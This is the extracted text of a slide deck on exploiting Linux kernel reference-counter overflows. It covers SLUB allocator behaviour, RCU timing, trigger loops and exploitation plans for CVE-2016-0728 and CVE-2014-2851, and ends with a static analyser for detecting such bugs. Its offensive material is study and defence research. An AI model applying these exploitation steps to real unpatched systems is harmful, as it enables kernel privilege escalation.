  • 22. ‱ Pages are divided into smaller ïŹxed chunks (power of 2) aka slabs ‱ Pages containing objects of the same size are grouped into caches ‱ SLAB allocator is the original slab allocator on implementation in OpenSolaris ‱ SLAB (in caps) - speciïŹc slab allocator implementation ‱ slab - generic term VMM Terminology
  • 23. VMM Linux SLUB allocator ‱ Starting from 2.6 branch, the slab allocator can be selected at compile time (SLAB, SLUB, SLOB, SLQB) ‱ SLUB is the default slab allocator on Linux ‱ All allocators perform the same function (and are mutually exclusive) but there’re signiïŹcant differences in exploitation
  • 24. ‱ General-purpose allocations (kmalloc/kzalloc) are for objects of size 8, 16, 32, 64, 128, 
, 8192 bytes ‱ Objects that are not power of 2 are rounded up to the next closest slab size ‱ Special-purpose allocations (kmem_cache_alloc) are for frequently-used objects ‱ Objects of the ~same size are grouped into the same cache VMM Linux SLUB allocator
  • 25. ‱ No metadata in slabs ‱ Instead, each slab page (struct page) has SLUB metadata (freelist ptr, etc) ‱ Free objects have a pointer (at offset=0) to the next free object in the slab (i.e., linked list) ‱ The last free object in the slab has its next pointer set to NUL VMM Linux SLUB allocator
  • 27. Counter overïŹ‚ows Exploitation procedure 1. OverïŹ‚ow the counter by calling the vulnerable path A() until the counter —> 0 2. Find path B() that triggers kfree() if counter == 0 3. Start allocating target objects to ïŹll partial slabs of the same size C() 4. Use the old object reference to 1. Modify the target object, or 2. Execute the (overwritten) function ptr in the vulnerable object 5. Trigger the overwritten function ptr in the target object
  • 28. Counter overïŹ‚ows Step 4 - option #1 // assume sizeof(struct A) == sizeof(struct B) struct A {‹ atomic_t counter; int some_var; ... }; struct B {‹ void (∗func)(); ... }; // Old kernel path ... a->some_var = 0; ...
  • 29. Counter overïŹ‚ows Step 4 - option #2 // assume sizeof(struct A) == sizeof(struct B) struct A {‹ atomic_t counter; void (*func)(); ... }; struct B {‹ int dummy; long user_controlled_var; ... }; // Old kernel path ... a->func(...); ...
  • 30. ‱ Find the target object B, s.t., 1. B has user-controlled variables 2. The user-controlled variable is aligned with the function pointer in the vulnerable object A Counter overïŹ‚ows Step 4 - option #2 Vulnerable object A Target object B void (*func)(); user-controlled data . . . . . . . . . . . .
  • 31. struct { long mtype; char mtext[ARBITRARY_LEN]; } msg; memset(msg.mtext, 'A', sizeof(msg.mtext)); msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { ... Counter overïŹ‚ows msgsnd() syscall
  • 32. long do_msgsnd(int msqid, long mtype, void __user *mtext, size_t msgsz, int msgflg) { struct msg_queue *msq; struct msg_msg *msg; int err; struct ipc_namespace *ns; ns = current->nsproxy->ipc_ns; if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 || msqid < 0) return -EINVAL; if (mtype < 1) return -EINVAL; msg = load_msg(mtext, msgsz); ... Counter overïŹ‚ows msgsnd() syscall
  • 33. struct msg_msg *load_msg(const void __user *src, size_t len) { struct msg_msg *msg; struct msg_msgseg *seg; int err = -EFAULT; size_t alen; msg = alloc_msg(len); if (msg == NULL) return ERR_PTR(-ENOMEM); alen = min(len, DATALEN_MSG); if (copy_from_user(msg + 1, src, alen)) goto out_err; ... Counter overïŹ‚ows msgsnd() syscall
  • 34. RCU ‱ Kernel counter decrements and object freeing are often implemented via RCU calls ‱ This introduces indeterminism in counter values ‱ If 0-check is done using an RCU callback, can skip the check and overïŹ‚ow past 0
  • 35. RCU ‱ Read-Copy Update - synchronisation mechanism (replacement for read-writer locking) ‱ Available since 2002 ‱ Low-overhead readers, immune to deadlocks, readers can run concurrently with updaters, etc. ‱ rcu_read_lock()/rcu_read_unlock(), rcu_assign_pointer(), rcu_dereference(), etc. ‱ Kernel API in ./Documentation/RCU/rcu.txt
  • 36. RCU void call_rcu(struct rcu_head *head, void (*callback) (void *head)); ‱ This call invokes a callback function callback() after all the CPUs have gone through at least one quiescent state. ‱ “For performance reasons, good implementations of RCU do not wait for completion of the quiescent cycle. Instead, they queue the cycle in batches and return.”
  • 37. ‱ The CPU performs a process switch ‱ The CPU starts executing in user mode ‱ The CPU executes the idle loop RCU Quiescent state
  • 38. static void callback_fn() { atomic_dec(&testp->count); } static void testfn() { atomic_inc(&testp->count); call_rcu(&testp->rcu, callback_fn); } static long device_ioctl(struct file *file, unsigned cmd, unsigned long args) { switch(cmd) { case IOCTL_SET: /* set counter value */ atomic_set(&testp->count, args); break; case IOCTL_TEST: /* increment and decrement the count */ testfn(); break; ... RCU
  • 39. int main() { int fd, i; fd = open(DEVICE_PATH, O_RDONLY); if (fd == -1) { perror("open"); return -1; } ioctl(fd, IOCTL_SET, 0); for (i=0; i < 100; i++) { ioctl(fd, IOCTL_TEST, NULL); } RCU User-space trigger
  • 40. (gdb) b testfn Breakpoint 17 at 0xffffffffa02250c0: file /home/vnik/rcu/rcu.c, line 64. (gdb) commands Type commands for breakpoint(s) 17, one per line. >silent >p testp->count >c >end (gdb) c Continuing. $150 = {counter = 0} $151 = {counter = 1} $152 = {counter = 2} $153 = {counter = 2} $154 = {counter = 3} $155 = {counter = 3} $156 = {counter = 4} $157 = {counter = 4} $158 = {counter = 2} $159 = {counter = 2} $160 = {counter = 3} ... RCU RCU calls
  • 41. int main() { int fd, i; fd = open(DEVICE_PATH, O_RDONLY); if (fd == -1) { perror("open"); return -1; } ioctl(fd, IOCTL_SET, 0); for (i=0; i < 100; i++) { ioctl(fd, IOCTL_TEST, NULL); sleep(1); // let the CPU go through a quiescent state } RCU User-space trigger
  • 42. (gdb) b testfn Breakpoint 18 at 0xffffffffa02250c0: file /home/vnik/rcu/rcu.c, line 64. (gdb) commands Type commands for breakpoint(s) 18, one per line. >silent >p testp->count >c >end (gdb) c Continuing. $191 = {counter = 0} $192 = {counter = 0} $193 = {counter = 0} $194 = {counter = 0} $195 = {counter = 0} $196 = {counter = 0} $197 = {counter = 0} $198 = {counter = 0} $199 = {counter = 0} $200 = {counter = 0} $201 = {counter = 0} $202 = {counter = 0} $203 = {counter = 0} ... RCU Synchronised RCU calls
  • 43. Counter overïŹ‚ows Test cases ‱ CVE-2014-2851 - group_info counter overïŹ‚ow (exploit published Jan 2016) ‱ CVE-2016-0728 - keyring counter overïŹ‚ow (write up published 3 weeks later)
  • 44. CVE-2016-0728 ‱ “This vulnerability has implications for approximately tens of millions of Linux PCs and servers, and 66 percent of all Android devices (phones/tablets).” - Perception Point ‱ Google said company researchers don't believe any Android devices are vulnerable to exploits by third-party applications. It also said researchers believe that the number of Android devices affected is "signiïŹcantly smaller than initially reported."
  • 45. CVE-2016-0728 ‱ Reference leak in the keyrings facility ‱ System call interface – keyctl syscall is provided so that userspace programs can use the facility for their own purposes. ‱ Each process can create a keyring for the current session using keyctl(KEYCTL_JOIN_SESSION_KEYRING, name) ‱ The keyring object can be shared between processes by referencing the same keyring name.
  • 46. CVE-2016-0728 User-space trigger for (i = 0; i < 0xfffffffd; i++) { serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "mykeyring"); if (serial < 0) { perror("keyctl"); return -1; } }
  • 47. CVE-2016-0728 long join_session_keyring(const char *name) { ... new = prepare_creds(); // increment the counter keyring = find_keyring_by_name(name, false); if (PTR_ERR(keyring) == -ENOKEY) { ... } else if (IS_ERR(keyring)) { ret = PTR_ERR(keyring); goto error2; } else if (keyring == new->session_keyring) { ret = 0; goto error2; } ... key_put(keyring); okay: return ret; error2: mutex_unlock(&key_session_mutex); error: abort_creds(new); // decrement the counter via RCU return ret; }
  • 48. CVE-2016-0728 struct key struct key { atomic_t usage; /* number of references */ key_serial_t serial; /* key serial number */ ... union { struct keyring_index_key index_key; struct { struct key_type *type; /* type of key */ char *description; }; }; ...
  • 49. CVE-2016-0728 Vulnerable object ‱ keyring object is of type struct key ‱ The object size is 184 bytes —> kmalloc-192 cache ‱ type ptr points to key_type struct containing function pointers: struct key_type { ... int (*vet_description)(const char *description); int (*preparse)(struct key_preparsed_payload *prep); void (*free_preparse)(struct key_preparsed_payload *prep); int (*instantiate)(struct key *key, struct key_preparsed_payload *prep); int (*update)(struct key *key, struct key_preparsed_payload *prep); int (*match_preparse)(struct key_match_data *match_data); void (*match_free)(struct key_match_data *match_data); void (*revoke)(struct key *key); ...
  • 50. CVE-2016-0728 Exploitation 1. OverïŹ‚ow the keyring reference counter and trigger kfree() ‱ Increment to 0xffffffff - eps, then eps ordered steps with sleep(1) 2. Allocate the target object replacing the vulnerable object (option 2) 3. Trigger the overwritten function ptr in keyring, e.g., type->revoke()
  • 51. CVE-2016-0728 Exploitation 128 < x <= 192 bytes struct key_type *type; 0xdeadbeef Target object X void (*revoke)(
); struct key_type at 0xdeadbeef User space Kernel space . . . . . . . . . . . . . . . . .
  • 52. CVE-2014-2851 ‱ Counter overïŹ‚ow in ping_init_sock() socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP); ‱ The vulnerable path can be reached by non- privileged users
  • 53. CVE-2014-2851 Vulnerable path int ping_init_sock(struct sock *sk) { struct net *net = sock_net(sk); kgid_t group = current_egid(); struct group_info *group_info = get_current_groups(); int i, j, count = group_info->ngroups; kgid_t low, high; inet_get_ping_group_range_net(net, &low, &high); if (gid_lte(low, group) && gid_lte(group, high)) return 0; ...
  • 54. CVE-2014-2851 struct group_info ‱ sizeof(struct group_info) = 140 bytes (kmalloc-192) type = struct group_info { atomic_t usage; int ngroups; int nblocks; kgid_t small_block[32]; kgid_t *blocks[]; }
  • 55. CVE-2014-2851 Challenges ‱ group_info is a frequently used object ‱ Does not contain any function pointers ‱ Cannot modify any object values (except for incrementing the refcounter) ‱ Race window between group_info free and target object allocation is very small ‱ Other processes use the old reference
  • 57. CVE-2014-2851 Exploitation - slab metadata overwrite 1. Increment the group_info usage counter close to 0xffffffff by creating ICMP sockets 2. Increment the usage counter by 1 and try to free group_info via faccessat() && repeat 3. Keep incrementing the group_info usage counter until it points to some user-space memory address 4. Map this region in user space and memset it to 0 5. Start allocating structure X in kernel space that has the size 128-192 bytes 6. The SLUB allocator will allocate this structure X at our user-space address
  • 58. CVE-2014-2851 Exploitation - slab metadata overwrite Free object Free object Free object Freed object Allocated object SLUB page { freelist* index=0; inuse=1; objects=5; 
 NULL *freeptr struct file User space
  • 59. COF Static Code Analyser
  • 60. COF Analyser Algorithm Step 1: CFG with inlined function invocations Step 2: CFG —> NFA Step 3: NFA —> DFA Step 4: DFA —> RE
  • 61. ‱ CFG for the entire kernel, then focus on user-space reachable code only (syscalls, ioctls, socket operations, etc.) ‱ LLVM for the kernel - http://llvm.linuxfoundation.org ‱ GCC Link Time Optimisation (LTO) - “gives GCC the capability of dumping its internal representation (GIMPLE) to disk, so that all the different compilation units that make up a single executable can be optimised as a single module.” - https://gcc.gnu.org/wiki/LinkTimeOptimization COF Analyser CFG
  • 62. ‱ GCC performs optimisation work in “passes” that form trees ‱ Custom pass called directly after the GCC “cfg” pass ‱ CFG for every function in the kernel, followed by manual function inlining COF Analyser CFG BB func1: func2(); BB2 func1: ... BB1 func1 BB2 func1: ... BB1 func2: ... BBn func2: ... CFG func2
  • 63. [Block main 1] [Block main 0] [Block main 2] a = 1; [Block main 3] [Block main 3.0] increment (&shared); [Block main 2.0] increment (&shared); [Block main 5] <L2>: return D.2309; [Block main 4] D.2309 = 0; [Block main 2.1] decrement (&shared); if (a == 0) struct shared_struct shared; int main(int argc, char **argv) { int a = 0; increment(&shared); decrement(&shared); if (!a) increment(&shared); return 0; } COF Analyser CFG
  • 64. ‱ Each basic block represents a state in the NFA ‱ Basic blocks containing the counter increment/ decrement functions are split into two states ‱ The edge (transition) between these two states is labeled with V (increment) or P (decrement) ‱ All other transitions are labeled with epsilon COF Analyser CFG -> NFA
  • 65. a = 1; increment(); b = 1; if ( 
 ) S1 S2 S2 V eps start end start = end COF Analyser CFG -> NFA
  • 67. ‱ Convert the obtained DFA to a regular expression ‱ Change semantics of the language operations (language composition, union, closure, etc.) ‱ The outcome is the oracle algorithm: yes or no answer ‱ Can then reconstruct the original path from NFA COF Analyser DFA -> RE
  • 68. ‱ Eliminating false-positives ‱ “Points-to” analysis some_struct->func_ptr() ‱ Rewriting automata manipulation algorithms COF Analyser Challenges and improvements
  • 69. static ssize_t do_sendfile(int out_fd, int in_fd, loff_t *ppos, size_t count, loff_t max) { struct fd in, out; ... in = fdget(in_fd); if (!in.file) goto out; if (!(in.file->f_mode & FMODE_READ)) goto fput_in; fput_out: fdput(out); fput_in: fdput(in); out: return retval; } COF Analyser sendïŹle syscall